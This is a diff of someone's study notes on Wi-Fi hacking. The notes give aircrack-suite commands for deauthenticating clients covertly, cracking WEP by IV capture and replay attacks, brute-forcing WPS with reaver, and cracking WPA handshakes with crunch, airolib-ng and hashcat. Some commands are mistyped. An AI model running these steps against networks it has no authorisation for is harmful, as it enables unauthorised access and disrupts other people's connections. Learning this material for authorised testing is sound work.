Doxpara1/Network-hacking/noted.md

 To pretend as client having its mac address
 To pretend like router having its mac address and disconnecting all networks **airplay-ng**
->airplay-ng  - -deauth  100000000 -a target_router_mac_address  -c client_mac_address  mo0   (mac_address info is taken from airodump-ng)
+>airplay-ng  --deauth  100000000 -a target_router_mac_address  -c client_mac_address  mon0   (mac_address info is taken from airodump-ng)
 >ctr  C    to stop

 ## GAINING ACCESS:

 ### WEP CRACKING
-The client encrypts the data with a unique key and sends in air to the router This router decrypts the data using same key.
+- The client encrypts the data with a unique key and sends in air to the router
+- This router decrypts the data using same key.
-Initial vector + passsword =  keystream
+- Initial vector + passsword =  keystream
-keystream + “this is the message”  →  cnu3dhubd   (encoded)
+- keystream + “this is the message”  →  cnu3dhubd   (encoded)
-router always have the key but not Initial vector(IV) IV is only 24bits so it repeats it again and again without creating unique key
+- router always have the key but not Initial vector(IV)
+- IV is only 24bits so it repeats it again and again without creating unique key

 Methods
-airodump-ng   to capture all packets/IVs aircrack-ng      to analyze the IVs and crack the key
+- airodump-ng   to capture all packets/IVs
+- aircrack-ng      to analyze the IVs and crack the key <br>
-> airodump-ng  - - bssid  target_mac  - -channel  2  - - write  filename   mon0
+> airodump-ng  --bssid  target_mac  --channel  2  --write  filename   mon0    <br>
-filename.cap is the file
+- filename.cap is the file <br>
 > aircrack-ng filename.cap
-prompts key found!
-23:42:23:A2 put the password in wifi as 234223A2  done
+- prompts key found!
+23:42:23:A2
+- put the password in wifi as 234223A2  done

-##### Fakeauth attack
+#### Fakeauth attack
--a for accknowledge must do before all attacks
+a for accknowledge must do before all attacks
 >aireplay-ng - -fakeauth 0 -a target_mac -h my_mac

 #### Arp request reply attack
-if the router or wifi is not having more data passed, it can't be cracked,so need to inject more packages with aireplay
+if the router or wifi is not having more data passed, it can't be cracked,so need to inject more packages with aireplay <br>
->aireplay-ng - -fakeauth 0 -a target_mac -h my_mac   (ACK for telling we are connecting to the netw interface )
+>aireplay-ng - -fakeauth 0 -a target_mac -h my_mac   (ACK for telling we are connecting to the netw interface ) <br>
->airodump-ng  - - bssid  target_mac  - -channel  2  - - write  file_name  mon0
+>airodump-ng  - - bssid  target_mac  - -channel  2  - - write  file_name  mon0 <br>
->aireplay-ng  - -arpreplay -b target_mac -h my_mac mon0        check data value in info
+>aireplay-ng  - -arpreplay -b target_mac -h my_mac mon0        check data value in info <br>
->aircrack-ng filename.cap
+>aircrack-ng filename.cap <br>
 or

-#### Korek ChopChop Attack   (refer somewhere)
+#### Korek ChopChop Attack   (refer somewhere) <br>
->aireplay-ng - -fakeauth 0 -a target_mac -h my_mac
->airodump-ng  - - bssid  target_mac  - -channel  2  - - write  file_name  mon0
->aireplay-ng - -chopchop -a target_mac -h my_mac
->packetforge-ng -0...............
-…..........
 or
-#### Fragmentation Attack (refer somewhere)
+#### Fragmentation Attack (refer somewhere) <br>

 ### WPA AND WPA2 CRACKING

-wpa and wpa2 have the wps push button enabled or disable which is useful in cracking.
+- wpa and wpa2 have the wps push button enabled or disable which is useful in cracking.
-This wps feature can be found by wash  - - interface mon0
+- This wps feature can be found by
+> wash  - - interface mon0
-Lck   tells locked or not
+- Lck   tells locked or not
-it may fail if the target router has PBC(push button auth) or wps disabled
+- it may fail if the target router has PBC(push button auth) or wps disabled

->reaver - -bssid  target_mac - -channel 1 - -interface mon0 -vvv - -no-associate
+>reaver - -bssid  target_mac - -channel 1 - -interface mon0 -vvv - -no-associate <br>
-paralleley add the down cmd
+paralleley add the down cmd <br>
->aireplay-ng - -fakeauth 0 -a target_mac -h my_mac
+>aireplay-ng - -fakeauth 0 -a target_mac -h my_mac <br>

-when PBC(push button auth) or wps disabled, use the following method
+- when PBC(push button auth) or wps disabled, use the following method <br>
 >airplay-ng  - -deauth  4 -a target_router_mac_address  -c client_mac_address  mon0   (use –deauth 4 so that client don't identify they are disconnected)

 **Create word list:**
 crunch
->crunch 6 8 abctd123$@ -o pass.txt
+> crunch 6 8 abctd123$@ -o pass.txt
-6 min combinations
+- 6 min combinations
-8 max combinations
+- 8 max combinations
-abctd123$@ combinations to use
+- abctd123$@ combinations to use

 >aircrack-ng handshake.cap  -w pass.txt
 done :)

 **Pairwise Master Key** from word list (faster than previous)
 >airolib-ng test-db  - -import password pass.txt
-create a text file with essid
+- create a text file with essid
 >airolib-ng test-db  - -import essid essid.txt
 >airolib-ng test-db –batch
-done :)
+- done :)

 >aircrack-ng -r test-db handshake.cap
 done :)

 **Hashcat** (use GPU - fastest cracking ) in windows
-download converted file of .cap to .hccapx and add it in hashcat dir add pass.txt in hashcat dir
+- download converted file of .cap to .hccapx and add it in hashcat dir
+- add pass.txt in hashcat dir
->hashcat64.exe -I          shows cpu and gpu info
+>hashcat64.exe -I          shows cpu and gpu info <br>
->hashcat64.exe -m 2500 -d 1 handshake.hcapx pass.txt
+>hashcat64.exe -m 2500 -d 1 handshake.hcapx pass.txt <br>
-m - wpa/wpa2 hash
+- m - wpa/wpa2 hash
-d -  which device to use
+- d -  which device to use